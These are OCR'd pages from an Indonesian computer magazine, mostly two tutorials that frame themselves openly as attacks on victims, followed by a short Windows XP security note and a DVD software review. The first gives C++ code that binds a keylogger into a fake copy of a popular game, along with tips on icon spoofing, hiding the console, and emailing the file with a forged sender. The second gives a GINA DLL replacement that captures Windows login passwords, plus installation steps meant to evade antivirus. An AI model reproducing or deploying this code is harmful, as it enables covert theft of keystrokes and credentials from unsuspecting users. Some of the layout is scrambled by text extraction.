Simulasi selesai dan kita sudah mendapatkan beberapa informasi yang sekiranya penting dan kita sudah dapat mencoba menjajal PHPNuke. Mungkin apa yang disajikan belumlah dapat memenuhi dahaga kita semua akan hal hacking, tetapi penulis sudah berusaha untuk sedikit mengisi kedahagaan tersebut. Vol. IV No. 04 NeoTek
37

NeoTutor

Deployment Keylogger
Dewanata (m_strdewanata@yahoo.com) menutup rangkaian artikel pembuatan keylogger dengan taktik deployment pada host program yang menarik agar tidak membuat curiga sang calon korban.
artikel yang ditulis penulis di majalah ini, yang menjelaskan mengenai perancangan dan pemrograman keylogger canggih. Untuk sekedar mengingatkan kembali, berikut adalah penjelasan singkat rangkaian artikel tersebut: • Artikel 1: perancangan kerangka utama program keylogger, pemrograman keyboard hook. • Artikel 2: penambahan rutin untuk identifikasi program yang aktif ketika terjadi event penekanan keyboard. • Artikel 3: pembuatan smtp engine untuk mengirimkan hasil tangkapan, menggunakan open relay smtp server. • Artikel 4: penambahan rutin otentikasi smtp, sehingga proses pengiriman dapat melalui subscribed email provider (misal: softhome, yahoo, dll). • Artikel 5: penambahan rutin untuk pengiriman attachment. • Artikel 6 (artikel ini): mengapsulasi keylogger ke dalam satu program lain. • Adendum: penjelasan pengkodean Base64 (diperkenalkan sejak Artikel 4) Pada setiap artikel, terdapat workshop untuk memprogram konsep dan ide ke dalam bentuk program jadi. Bahasa yang digunakan adalah C++ dengan kompiler Visual C++ 6.0.

C++ WO R KS H O P

A

RTIKEL INI ADALAH ARTIKEL TERAKHIR DARI SERANGKAIAN

Metode Penumpangan
Penumpangan dilakukan dengan menyuntikan program kita ke program host. Penyuntikan ini tentunya tidak boleh mengganggu proses program host ketika nantinya dieksekusi. Yang agak rumit, penyuntikan ini juga harus menjamin bahwa program keylogger kita akan di-eksekusi sebelum atau sesudah program host dijalankan. Ada beberapa metode yang umum digunakan, antara lain: Membuat program host baru Paket keylogger dan program host dikemas dalam satu program baru, yang identitasnya (nama, ikon) dibuat mirip dengan program host asli. Program ini ketika dijalankan, akan menginstal dan menjalankan keylogger, dan kemudian menjalankan program host asli. Memanipulasi PE (Portable Executable) header Pada metode ini, kode keylogger disuntikkan (bisa di awal atau di akhir) secara langsung ke program host. Langkah selanjutnya adalah melakukan sedikit perubahan pada PE header, yaitu pada informasi section (jika lokasi penyuntikkan di awal/buat section baru) atau ukuran last section (jika lokasi penyuntikan di akhir). Pada artikel ini penulis akan melakukan penumpangan menggunakan metoda pertama yang relatif lebih sederhana. Metode kedua membutuhkan pembahasan yang mendalam, menyangkut format PE dan fungsi-fungsi Win32 API yang ada di kernel32.dll guna menjalankan rutin penularan. Metode ini kemungkinan akan dibahas di artikel terpisah, tergantung permintaan pembaca.

Proses Deployment
Seperti telah disebutkan sebelumnya, artikel ini akan menjelaskan proses deployment keylogger. Paket keylogger kita terdiri atas dua file: satu exe dan satu dll. Kedua file ini harus disalin ke c:\winnt\system32 dan kemudian untuk mengaktifkan keylogger, seseorang harus menjalankan file exe (baca Artikel 1). Masalahnya, tentunya agak susah untuk meminta sang korban melakukan langkah-langkah tersebut dengan sukarela di komputernya.

Membuat Program Host Baru
Konsep dasarnya adalah membungkus semua file yang dibutuhkan ke dalam satu program host baru, lengkap dengan rutin untuk melakukan ekstraksi dan instalasi. Di akhir instalasi, proses dikembalikan ke program host asli agar tidak menimbulkan kecurigaan. Secara logis, rangkaian byte yang mengisi program host baru kita dapat digambarkan sebagai berikut:
rutin_ekstraksi > pembatas > paket_keylogger > pembatas > program_host_asli > pembatas

Menumpang Program Lain
Ada kecenderungan seseorang dengan sukarela menjalankan sebuah program yang di-attach di email, jika email tersebut dikirim oleh pengirim yang dikenalnya. Apalagi jika program tersebut adalah program yang dinanti-nanti, game misalnya. Anda tentunya telah ahli dalam memalsukan identitas pengirim (dengan memanipulasi header smtp, seperti dijelaskan di Artikel 4). Namun jika pun sang korban terkelabui dengan cara ini, kecurigaannya bisa saja timbul jika ternyata program menarik tersebut tidak melakukan apa-apa, karena sebenarnya program itu adalah keylogger kita, yang tentunya memang bekerja di background. Idealnya, keylogger kita menumpang sebuah program lain yang memang menarik untuk dijalankan. Program lain ini kita sebut saja sebagai program host.
38

Pembatas berfungsi untuk membatasi rangkaian byte satu bagian dengan bagian lainnya.

Workshop
Untuk praktek, penulis menggunakan sebuah program game flash yang populer, yaitu lapin.exe. Game ini cukup menghibur dan berukuran relatif kecil (< 500 kb) sehingga masih feasible untuk dikirim via email sebagai attachment. Gambar 1 menunjukkan struktur program host baru yang akan kita buat.

NeoTek Vol. IV No. 04

NeoTutor
lapin.exe (palsu) installer.exe <pembatas> srv32.exe <pembatas> srv32d.dll <pembatas> lapin.exe (asli) <pembatas> Gambar 1.

jumpai, agar tidak terjadi kesalahan ekstraksi. • lakukan proses yang sama pada tiga file lainnya • tutup lapin.exe Kotak 1 menunjukkan kode yang digunakan untuk melakukan kapsulasi.

Proses Ketika Menjalankan mdd.exe (Palsu)
Ketika lapin.exe (palsu) dijalankan, sebenarnya kita menjalankan installer.exe. Program inilah yang bertanggung jawab untuk menjalankan proses yang kita inginkan. Di bawah ini adalah urutan proses tersebut: 1. korban menjalankan program lapin.exe (yang palsu) 2. installer.exe akan dijalankan secara otomatis 3. installer.exe mengekstrak srv32.exe dan srv32d.dll ke c:\winnt\system32 4. installer.exe mengekstrak lapin.exe (asli) ke c:\winnt\temp 5. installer.exe mengaktifkan c:\winnt\system32\srv32.exe 6. installer.exe menjalankan c:\winnt\temp\lapin.exe (asli).

Keterangan: • installer.exe adalah program yang berisi rutin penginstal keylogger dan menjalankan keylogger dan program host (asli)

• srv32.exe adalah
program utama keylogger
// compactor.cpp // programmed by dewanata - december 2003 #include "stdafx.h" #include <fstream.h> #include <string.h> #include <stdio.h> char ** szFileOut; char * szFileResult; char * szBoundary = ">BOUND<";

• srv32d.dll adalah file
dll keylogger. Kedua file di atas adalah hasil kompilasi dari kode yang dibahas di Artikel 2.

• lapin.exe adalah
nama program host

// boundary string

Proses Kapsulasi
Proses kapsulasi di sini adalah proses penggabungan data binary empat file secara berurutan. Prosesnya sangat sederhana, yaitu • buat satu file baru dengan nama lapin.exe • buka file installer.exe, baca byte demi byte, tulis ke lapin.exe, tutup installer.exe setelah proses baca-tulis selesai • tulis string pembatas di lapin.exe, sebagai indikasi batas antar file. String pembatas sebaiknya dipilih satu kata yang tidak umum di-

void Capsulating(){ char ch; int i=0; ofstream fout(szFileResult,ios::binary); while(strlen(szFileOut[i])>0){ ifstream fin(szFileOut[i],ios::binary); do{ fin.get(ch); if(fin.eof())break; fout.put(ch); }while(1); fin.close(); fout.write(szBoundary,strlen(szBoundary)); i++; } fout.close(); } int main(int argc, char* argv[]) { szFileOut = new char*; szFileOut[0]="c:\\neotek\\artikel_6\\deploy\\installer.exe"; szFileOut[1]="c:\\neotek\\artikel_6\\deploy\\srv32.exe"; szFileOut[2]="c:\\neotek\\artikel_6\\deploy\\srv32d.dll"; szFileOut[3]="c:\\neotek\\artikel_6\\deploy\\lapin.exe"; szFileOut[4]=""; szFileResult = new char[512]; szFileResult = "c:\\neotek\\artikel_6\\deploy\\out\\lapin.exe"; Capsulating(); return 0; }

// installer // keylogger // keylogger dll // program host // terminator // result file

Kotak 1.

Vol. IV No. 04 NeoTek

39

NeoTutor
Program installer.exe
Program ini sebaiknya dibuat sekecil mungkin. Pada artikel ini, installer.exe adalah sebuah program console (bukan MFC), dengan beberapa modifikasi (dijelaskan kemudian). Pada dasarnya, program ini bertanggung jawab atas dua proses utama: • membuka file lapin.exe (palsu); membaca isinya byte demi byte, dan menuliskannya ke masing-masing file output • proses eksekusi; menjalankan keylogger dan program lapin.exe yang asli.

Modifikasi Program installer.exe
Modifikasi program installer.exe Beberapa pekerjaan modifikasi perlu dilakukan, sebagai berikut: • penambahan ikon; agar tidak menimbulkan kecurigaan, kita sebaiknya menyamakan ikon program host palsu kita dengan yang asli. Pada workshop ini, program host asli adalah sebuah game Flash yang memiliki ikon yang telah sangat populer. Ikon ini kita dapatkan menggunakan program ResHacker.exe. Masalahnya, ikon tersebut harus kita letakkan di program installer.exe. installer.exe adalah sebuah console application, bukan MFC, yang tentunya secara default tidak menyediakan Resources, tempat kita biasanya meletakkan ikon. • menghilangkan tampilan console; seperti diketahui, setiap program console secara default memiliki sebuah tampilan window ketika dijalankan di lingkungan Windows. Hal ini tidak kita inginkan, karena dapat menimbulkan kecurigaan sang korban: lho kok muncul dua windows? Yang pertama adalah window console installer.exe, yang kedua adalah window program host asli. Untuk itu, beberapa modifikasi kecil dilakukan di framework proyek installer. Karena keterbatasan tempat, modifikasi tidak dijabarkan secara detail di artikel ini. Penulis Anda mempelajari source code yang disertakan di CD.
Gambar 3.

Selanjutnya, tanpa disadari oleh si korban, setiap ketikan dan aktivitasnya dicatat dan dikirim ke mailbox kita (Gambar 4).

Gambar 4.

Penutup
Dengan berakhirnya artikel ini, maka berakhir pula serial artikel penulis yang membahas perancangan dan pembuatan keylogger di majalah ini. Penulis berharap, artikel-artikel ini dapat memacu minat dan kreativitas kita di dunia perangkat lunak dan keamanan sistem. Penulis mengucapkan banyak terima kasih kepada redaksi NeoTek yang telah menyediakan 'kavling' NeoTutor di (paling tidak) tujuh edisi. Terima kasih pula kepada para pembaca yang telah mengirimkan email, baik untuk sekedar bertanya, memberi saran, kritik dan bahkan ada yang menawarkan proyek.
Ralat artikel keylogger NeoTek IV/2 Pada artikel keempat terjadi kesalahan penempatan gambar, sehingga membingungkan pembaca. Gambar terakhir seharusnya berikut ini.

Deployment
Sekarang Anda dengan tenang dapat mengirimkan file 'game' Anda ke si korban. Sebaiknya game tersebut di-zip sebelum dikirim. Anda bisa juga memalsukan identitas pengirim seperti yang diterangkan di Artikel 4. Anda tinggal berharap 'game' ini memuaskan si korban, dan kemudian dia mem-forward-nya ke teman lainnya. Jika Anda mengaktifkan smtp engine (baca Artikel 3, 4, dan 5) maka jangan lupa memeriksa mailbox Anda, karena hasil tangkapan akan mengalir deras ke Anda. Anda dengan tenang tinggal membaca hasil tangkapan, nun jauh di sana. Gambar 2 menunjukan program palsu kita, siap disebarkan. Dengan ikon yang menggoda, membuat si korban terpancing untuk menjalankannya. Ketika program dijalankan, program palsu kita secara rahasia melakukan instalasi dan kemudian menjalankan program asli seperti yang tampil pada Gambar 3.
Gambar 2.

40

NeoTek Vol. IV No. 04

NeoTutor

Ngintip Login Windows 2000
Setelah selesai membahas cara membuat keylogger, artikel Dewanata (m_strdewanata@yahoo.com) kali ini membahas cara membongkar informasi username, password, dan domain pada Windows 2000. Yang pertama ini dengan membentuk trojan dengan konsep yang serupa dengan keylogger.
mengklaim mempunyai kemampuan untuk membongkar informasi account (username, password, domain) Windows 2000 seseorang. Jika diteliti, mayoritas program-program tersebut menggunakan teknik bruteforce attack yang agak susah diharapkan keberhasilannya. Selain itu, teknik ini memakan resource yang cukup besar, baik dari sisi waktu maupun resource fisik. Pada artikel ini penulis akan mencoba menjelaskan satu teknik alternatif untuk mendapatkan informasi tadi dengan metode yang relatif sederhana.

W I N D OWS S E C U R I T Y

B

ANYAK BEREDAR DI INTERNET PROGRAM-PROGRAM YANG

Pada artikel ini, penulis akan menjelaskan mengenai teknik pertama, yaitu intersepsi.

Intersepsi
Dari deskripsi di atas, terlihat bahwa intersepsi paling cocok dilakukan di konteks desktop login, sebab di sinilah user mengetikkan informasi login. Konteks ini ditandai dengan diaktifkannya SAS oleh user dengan menekan kombinasi Ctr+Alt+Del, atau pada pertama kali user login ke Windows. Secara real, proses ini sebenarnya bukan ditangani langsung oleh winlogon, namun didelegasikan ke satu proses yang G disebut GINA (Graphical Identification and Authentication). GINA diimplementasikan oleh Windows mengunakan satu DLL yang di simpan di folder C:\WINNT\SYSTEM32 dengan nama msgina.dll. Anda tanpa sadar sering berinteraksi dengan file ini, yaitu pada saat Anda login, atau pada saat menekan Ctr+Alt+Del untuk mengubah password, menjalankan Task Manager, shutdown, atau fungsi lainnya. Yang menarik, Windows memberi kesempatan bagi kita untuk mengganti msgina. Hal ini sangat berguna jika kita ingin mengubah karakteristik proses login, misal: login dengan menggunakan smart card, retina reader, login bertingkat (sinkronisasi account Windows ke net provider lain misal Novell, atau ERP/mail server), atau bahkan hanya sekedar mengganti logo pada dialog ganti-password Windows. Pada artikel ini, akan dijelaskan mengenai pembuatan GINA DLL yang bisa memenuhi kebutuhan dasar kita (yang sebenarnya sangat sederhana), yaitu menangkap dan menyimpan informasi logon seseorang. Produk akhir dari artikel ini adalah sebuah trojan yang jika terinstal di komputer korban, akan menyimpan informasi account Windows user yang logon ke dalam registry. Nantinya informasi ini bisa saja dikirim via email oleh trojan kita, dengan menambahkannya dengan utility-utility tertentu yang akan dijelaskan di akhir artikel ini.

Sistem Keamanan Windows 2000
Ketika seseorang login ke Windows 2000, sistem akan memulai satu proses interaksi logon, yang ditangani oleh program winlogon.exe. Pada sesi ini, Windows akan menciptakan tiga konteks desktop (tampilan) yaitu: • login desktop (desktop ketika kita mengisikan username dan password) • user's desktop (tampilan desktop yang kita pakai seharihari) • screen saver desktop (desktop untuk menampilkan screen saver dan mengunci sistem) Tahap selanjutnya adalah winlogon akan mendaftarkan inS tersepsi (keyboard hook) kombinasi keyboard SAS (Secure Attention Sequence), yaitu kombinasi penekanan tombol Ctr+Alt+Del. SAS ini dipakai untuk berpindah dari konteks user's desktop ke login dekstop. Ketika pertama kali seseorang login ke Windows, sebenarnya orang tersebut mengetikkan username, password, dan domain di tampilan login desktop. Informasi ini kemudian L akan dikirimkan ke LSA (Local Security Authority) Server. Jika berhasil terotentikasi, winlogon akan menciptakan satu token akses untuk user ini, yang kadang kita kenal dengan = istilah SID (=Security ID). SID ini yang kemudian akan menentukan akses level si user terhadap semua resource yang tersedia di sistem Windows tersebut. Pada akhirnya, winlogon akan berpindah ke konteks user's desktop dan akan terus di sini sampai user mengaktifkan SAS dengan menekan kombinasi tombol Ctr+Alt+Del atau sistem mengaktifkan screen saver.

Pembuatan GINA.DLL
Dalam pembuatan GINA DLL, digunakan bahasa C (bukan C++). Tidak perlu berpikir sulit-sulit, karena Visual C++ (dengan MSDN-nya) sudah menyediakan kerangka GINA DLL yang dapat kita manfaatkan. Silahkan Anda cari di MSDN dengan keyword ginastub.c. Stub tersebut ditulis oleh seseorang di Microsoft. Stub ini (setelah di-compile menjadi DLL) akan berfungsi sebagai inceptor (pencegat) dan kemudian tetap meneruskan alur program ke DLL yang di-bajak. Teknik ini biasa digunakan untuk membajak fungsi-fungsi API Windows. Keuntungan teknik ini adalah programming effort yang dibutuhkan relatif kecil, yaitu cukup menyediaVol. IV No. 04 NeoTek
41

Celah Keamanan
Terlihat bahwa ada beberapa celah yang dapat kita manfaatkan untuk mendapatkan informasi logon seseorang: • Intersepsi (melakukan pencegatan) ketika user mengetikkan informasi logon di login desktop • Meng-hack LSA Server • Memanipulasi SID • Teknik-teknik lainnya.

NeoTutor
kan prototype program yang akan dibajak, tambahkan kode kita pada fungsi-fungsi yang akan di-intersepsi, lalu kembalikan alur proses ke fungsi yang asli. Dengan demikian, karakter program dapat dibuat hampir menyerupai program asli sehingga mengurangi kecurigaan si korban. Teknik ini pada dasarnya serupa dengan yang digunakan penulis ketika membuat artikel Keylogger di beberapa edisi terdahulu. Pada artikel ini, penulis hanya akan menjelaskan fungsi WlxLoggedOutSAS().

Fungsi WlxLoggedOutSAS()
Terlihat bahwa fungsi ini akan aktif ketika sistem dalam keadaan logged-out. Dalam keadaan ini, belum ada seorang pun logged-on di sistem. Keadaan ini bisa dijumpai pada saat kita menjalankan komputer untuk pertama kali (sebelum login) atau sesaat setelah kita logoff. Pada keadaan ini, konteks yang aktif adalah login dekstop. Sesaat setelah Anda mengetikkan username, password, dan domain, dan kemudian menekan tombol OK, maka fungsi ini akan dijalankan. Informasi yang Anda ketikkan akan diproses dan disimpan di sebuah pointer bernama pMprNotifyInfo. Pointer inilah yang kemudian kita ekstrak untuk menangkap informasi yang kita inginkan. Adapun struktur pointer tersebut adalah sebagai berikut:
typedef struct _WLX_MPR_NOTIFY_INFO { PWSTR PWSTR PWSTR PWSTR pszUserName; pszDomain; pszPassword; pszOldPassword;

Sistem

stub

msgina.dll

Gambar 1.

Protoype GINA.DLL dapat dilihat pada Kotak 1. Jangan pusing dulu, pada dasarnya fungsi-fungsi di atas berguna untuk menciptakan karakteristik login yang kita inginkan. Prefix PGWLX adalah identifikasi bahwa ini adalah global pointer fungsi winlogon. Dengan menghilangkan prefix tadi, kegunaan fungsi-fungsi di atas bisa ditebak, seperti misalnya Negotiate (untuk negosiasi awal), Initialize (untuk inisialisasi sistem), LoggedoutSAS (log out), dsb. Tabel di bawah ini menjelaskan mengenai penggunaan sebagian fungsi-fungsi di atas di setiap status logon. Status logon
Booting

} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;

Fungsi winlogon yang dijalankan

WlxNegotiate() WlxInitialize() Sebelum dan WlxSASNotify() ketika logon WlxLoggedOutSAS() Setelah Logged-on WlxSASNotify() WlxLoggedOnSAS() Lock WlxSASNotify() WlxLoggedOnSAS() ' returning WLX_LOCKWINSTA Unlock WlxSASNotify() WlxWkstaLockedSas() ' returning WLX_UNLOCKWINSTA Log-off WlxSASNotify() (by Ctr+Alt+Del) WlxLoggedOnSAS() ' returning WLX_LOGOFFUSER WlxLogoff() Shutdown WlxSASNotify() (by Ctr+Alt+Del) WlxLoggedOnSAS() ' returning WLX_LOGOFFANDSHUTDOWN WlxLogoff() WlxShutdown() typedef BOOL (WINAPI *PGWLXNEGOTIATE)( DWORD, DWORD* );

Pada Kotak 2 ditampilkan listing fungsi ini secara lengkap. Baris yang diarsir adalah baris tambahan kita, yang berfungsi untuk 'menangkap' informasi account yang dimasukan oleh user, lalu menyimpannya di satu tempat di registry. Yang penting untuk diperhatikan, pada konteks desktop login, SID yang aktif adalah sebagai SYSTEM, bukan sebagai user tertentu seperti yang berlaku di konteks user's desktop. Ini yang menyebabkan penulis menyimpan informasi di HKEY_LOCAL_MACHINE, bukan di HKEY_CURRENT_USER. Fakta ini juga menarik untuk disimak, sebab bisa dimanfaatkan untuk membuat ekploitasi jenis lain, yang dapat mempromote level akses lokal kita (misal: dari user ke admin) di satu sistem yang mempunyai tingkat restriksi tinggi, misalnya di kantor, di kampus, atau di beberapa warnet. RunLogonScript() adalah fungsi buatan sendiri, yang dipakai untuk menjalankan skrip atau program tertentu pada saat login. Banyak virus atau trojan yang mengaktifkan rutinnya setiap kali Windows dijalankan dengan meletakkan nama program pengaktif di:

typedef BOOL (WINAPI *PGWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* ); typedef VOID (WINAPI *PGWLXDISPLAYSASNOTICE)( PVOID ); typedef int (WINAPI *PGWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *); typedef BOOL (WINAPI *PGWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID ); typedef int (WINAPI *PGWLXLOGGEDONSAS)( PVOID, DWORD, PVOID ); typedef VOID (WINAPI *PGWLXDISPLAYLOCKEDNOTICE)( PVOID ); typedef int (WINAPI *PGWLXWKSTALOCKEDSAS)( PVOID, DWORD ); typedef BOOL (WINAPI *PGWLXISLOCKOK)( PVOID ); typedef BOOL (WINAPI *PGWLXISLOGOFFOK)( PVOID ); typedef VOID (WINAPI *PGWLXLOGOFF)( PVOID ); typedef VOID (WINAPI *PGWLXSHUTDOWN)( PVOID, DWORD ); typedef BOOL (WINAPI *PGWLXSCREENSAVERNOTIFY)( PVOID, BOOL * ); typedef BOOL (WINAPI *PGWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );

Kotak 1. Prototype GINA.DLL

42

NeoTek Vol. IV No. 04

NeoTutor
int WINAPI WlxLoggedOutSAS( PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo, PVOID *pProfile) { int iRet; TCHAR szUsername [MAX_LENGTH]; TCHAR szPassword [MAX_LENGTH]; TCHAR szDomain [MAX_LENGTH]; iRet = GWlxLoggedOutSAS( pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile ); if(iRet == WLX_SAS_ACTION_LOGON) { SetCursor(LoadCursor(NULL, IDC_WAIT)); WideCharToMultiByte(CP_ACP,0, pMprNotifyInfo->pszUserName, -1, szUsername, sizeof(szUsername), NULL,NULL); WideCharToMultiByte(CP_ACP,0, pMprNotifyInfo->pszDomain, -1, szDomain, sizeof(szDomain), NULL,NULL); WideCharToMultiByte(CP_ACP,0, pMprNotifyInfo->pszPassword, -1, szPassword, sizeof(szPassword), NULL,NULL); // save username WriteStringToRegistry( HKEY_LOCAL_MACHINE, "SOFTWARE\\Dewanata", "Username", szUsername); // save password WriteStringToRegistry( HKEY_LOCAL_MACHINE, "SOFTWARE\\Dewanata", "Password", szPassword); // save domain WriteStringToRegistry( HKEY_LOCAL_MACHINE, "SOFTWARE\\Dewanata", "Domain", szDomain); RunLogonScript(); } return iRet; }

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\ Run. Masalahnya, lokasi ini adalah lokasi pertama yang akan diperiksa oleh pembasmi virus/trojan. Fungsi RunLogonScript() ini dapat menjadi alternatif untuk itu. WriteStringToRegistry() adalah fungsi buatan sendiri untuk menulis string ke satu key tertentu di registry.

Kompilasi
Penulis menyertakan source code di CD NeoTek edisi ini. Kode dikemas dalam satu project Visual C++, dengan nama newgina. Anda dianjurkan untuk mempelajari sendiri file-file project, mengingat keterbatasan tempat di artikel ini untuk membahasnya satu per satu. Untuk mengkompilasi sebuah DLL, cukup masuk ke menu Build > Rebuild All di lingkungan Visual C++. Setelah proses build selesai, dapatkan newgina.dll di folder/release.

Instalasi
Untuk instalasi, salin file newgina.dll ke C:\WINNT\SYSTEM32. Kemudian jalankan regedit, masukkan entry baru ke: HKEY_LOCAL_MACHINE\SOFTW ARE\Microsoft\Windows NT\ CurrentVersion\Winlogon dengan nama GinaDLL dan value newgina.dll, seperti ditampilkan pada Gambar 2. Untuk trojan yang sesungguhnya, tentunya prosedur instalasi ini sebaiknya dikemas dalam satu rutin infektor yang compact, sehingga dengan cepat dapat terinstal di sistem korban secara otomatis.

Hasil
Untuk melihat hasilnya, restart komputer anda. Setelah proses login selesai, jalankan regedit. Temukan hasil dari tangkapan yang disimpan di cabang registry: HKEY_LOCAL_MACHINE\ SOFTWARE\Dewanata Terlihat bahwa informasi account seperti username, password, dan domain dengan mudah dapat kita ketahui.
Kotak 2. Listing lengkap.

Vol. IV No. 04 NeoTek

43

NeoTutor
Windows XP Hacking
Windows 2000, Windows NT, Windows XP, serta Windows Server 2003 semuanya dikelompokkan dalam Windows NT Family, mengingat semua menggunakan kernel yang sama, yaitu kernel yang berasal dari Windows NT. Bahasan Ngintip Login Windows 2000 pada dasarnya dapat diterapkan pada anggota keluarga Windows NT lainnya, termasuk Windows XP maupun Windows Server 2003. Kendatipun dikatakan sebagai anggota keluarga Windows yang paling aman, Windows XP dan Windows Server 2003 sebenarnya mempunyai banyak kelemahan. Salah satu yang paling jelas adalah serangan worm Blaster yang menyerang Windows NT family. Keluarga Windows 9x/ME malah tidak terkena. Windows XP memang lebih aman dalam hal local security. Mem-boot ulang komputer maupun masuk ke safe mode tetap akan menampilkan login screen, berbeda dengan Windows 9x/ME yang local security-nya sangat lemah. Tapi Windows XP masih mempunyai kelemahan, yaitu pada floppy disk. Buat DOS boot floppy disk dan anda dapat menggunakan perintah standar DOS untuk meng-copy isi hard disk. Hali ini akan berhasil apabila Windows XP masih menggunakan format FAT32. Apabila sudah menggunakan format NTFS, cara ini tidak akan berhasil. Tapi kini ada utility untuk membaca partisi NTFS yaitu NTFSDOS. Download di www.sysinternals.com. Kesimpulannya? Kalau data anda benar-benar penting, melindunginya dsengan menggunakan partisi NTFS tidaklah cukup, melainkan perlu anda enkripsi. Windows XP Professional yang dijalankan pada NTFS sudah dilengkapi dengan dukungan built-in untuk enkripsi dan dekripsi file. Pemakai Windows XP Home harus menggunakan encrytion tool pihak ketiga. Untuk mengkonversi partisi FAT32, boot ke MS DOS command prompt dan ketikkan perintah: convert C: /FS:NTFS Proses konversi akan berlangsung satu jam atau lebih dan sangat dianjurkan untuk men-defragment hard disk anda sebelum mengkonversinya, dan setelah selesai konversi, jalankan defragmentasi sekali lagi.

Gambar 2. Menambahkan GinaDLL pada registry.

Pengembangan Selanjutnya
Dengan mengetahui proses dasar, maka anda dengan mudah dapat mengembangkan program ini menjadi sebuah trojan yang powerful. Contohnya adalah dengan menambahkan SMTP engine dan rutin penyebar/infector, yang telah dijelaskan di artikel-artikel yang ditulis oleh penulis di majalah ini di beberapa edisi yang lalu. Dengan menambahkan SMTP engine, trojan (setelah terinstal) bisa diperintahkan untuk mengirimkan informasi account ke alamat email tertentu. Ingat, program ini telah dilengkapi dengan fungsi RunLogonScript(), sehingga dapat dimanfaatkan untuk menjalankan sebuah program residen, yang

kemudian mengaktifkan rutin pengiriman email atau payload infektor berdasarkan satu event/timer tertentu. Secara positif, teknik ini dapat kita manfaatkan untuk melakukan multiple login ke beberapa provider atau server, yang tidak memiliki fasilitas account synchronization. Di beberapa software komersial yang dikembangkan penulis, ada satu kasus dengan software tersebut membantu mensinkronisasikan informasi account Windows (termasuk jika ada perubahan informasi account seperti mengganti password) ke 4 (empat) ERP dan mail server, sehingga terwujud satu lingkungan single logon di atas beberapa sistem yang berbeda-beda. Menarik bukan?

Gambar 3. Hasil tangkapan username dan password. 44

NeoTek Vol. IV No. 04

NeoReview

KONVERSI LANGSUNG

DVD-RAM dan DVD Video
Menjadi MPEG-File Mengenal DVD MovieFactory S E
Ulead Movie Factory SE selain dapat meng-capture video dari DVD video, dapat pula mengcapture video dari DVD-RAM disc, baik itu yang menjadi bagian dari DVD camera (Hitachi atau Panasonic) maupun DVD-RAM disc dari Toshiba laptop yang terbaru.
DVD DISC MENJADI DUA keping VCD (NeoTek IV/3) membawa kerepotan sendiri, terutama sewaktu menjalankan DVD2AVI. Pasalnya bukan di videonya, melainkan di audionya. Audio yang terdapat pada DVD bisa terekstrak menjadi file MPA, AC3, atau DTS dan ternyata TMPGEnc belum men-support semua format audio yang dihasilkan. Format AC3 (Dolby digital) terdiri dari 6 channel, sedangkan audio pada komputer hanya mendukung 2 channel. Tidak heran apabila format AC3 tidak bisa dikenali oleh kebanyakan software video editing. Demikian juga dengan format dts yang juga merupakan surround audio dengan banyak channel. Untuk mengatasi hal ini, dalam CD NeoTek kali ini disediakan AC3 Decoder yang akan menggabungkan keenam channel audio tadi menjadi dua channel saja.

T

ERNYATA ARTIKEL KONVERSI

Untuk Sepenuhnya Mengendalikan Konversi
Memang cara yang dibahas di NeoTek IV/3 akan sangat sesuai apabila anda ingin dapat sepenuhnya mengendalikan konversi. Bukan sekedar dari DVD menjadi VCD atau SVCD serta apakah untuk di-playback di komputer atau TV NTSC, ataupun PAL, melainkan sampai pengaturan bit rate, sehingga anda dapat mengkonversi satu DVD video untuk dimainkan di Pocket PC. Dengan memilih format dan bitrate yang tepat satu DVD video dapat anda konversi menjadi file video bermutu maksimum untuk dimainkan pada Pocket PC yang dilengkapi dengan SD card 256 Mbyte (jadi sasaranya adalah mengkonversi DVD video yang 4,7 Gbyte menjadi file video dengan ukuran dibawah 256 Mbyte.

Semuanya kalau bisa langsung dengan satu program tunggal saja, jadi tidak repot-repot berganti-ganti program dengan segala kerepotannya. Setelah menelaah software yang ada, pilihan jatuh pada Ulead DVD Movie Factory SE (full version), yang berbeda f dengan Ulead DVD Movie Factory 2 (trial version) yang pernah dibahas di NeoTek III/10. Berbeda dengan DVD Movie Factory 2 yang memberi fasilitas memberi judul maupun background untuk video clip kita, versi SE tidak menyediakannya, namun semua fungsi dasar sudah tersedia: Video capture Mampu meng-capture dari DVD video disc, DVD-RAM disc (langsung ataupun dari DVD camera), serta VCD disc (file *.dat). Hasil capture dari DVD video disc, DVD-RAM disc, maupun VCD disc dapat diubah menjadi file MPEG-1, MPEG-2, maupun format-format untuk televisi PAL, NTSC, serta VCR. Beberapa scene dapat disusun dalam urutan sesuai storyboard anda di sini. Video clip editing File MPEG-1 atau MPEG-2 yang dihasilkan dapat diedit dengan menentukan clip awal dan akhir. Pada menu ini pula konversi ditetapkan secara batch ataupun bila ingin langsung membentuk movie dalam format yang diinginkan. Export Yang dimaksud export di sini dapat berupa konversi ke format lain ataupun mem-burn disc dalam format yang diinginkan.

Untuk Sekedar Konversi
Untuk sebagian besar dari kita mungkin sekedar mengkonversi DVD video menjadi file MPEG-1 (playback di PC) atau menjadi VCD atau SVCD dengan format PAL sudah memadai. Untuk itu yang diperlukan adalah software yang membaca langsung DVD video disc, menampilkan scene yang ada agar dapat dipilih, tapi tidak mengubahnya menjadi file AVI (terlalu besar) melainkan langsung jadi file MPG dengan spesifikasi video dan audio yang diinginkan.

Tetap Belum Mendukung Format Audio AC3 dan DTS
Yang perlu diperhatikan dalam menggunakan DVD Movie Factory SE adalah bahwa pada dasarnya software ini ditujukan untuk mengkonversi DVD video disc dari home video (atau juga DVD video bajakan) yang tidak menggunakan surround digital sound seperti Dolby Digital (AC3) ataupun DTS. Apabila DVD disc yang ingin anda konversi menggunakan AC3 atau DTS, maka audio file tersebut tidak akan dikenali oleh software dan VCD hasil konversi anda akan bisu sebab tidak menyertakan mampu melakukan sampling terhadap audio dengan kedua format yang bersangkutan. Vol. IV No. 04 NeoTek
45

NeoReview

Instalasi DVD MovieFactory S E
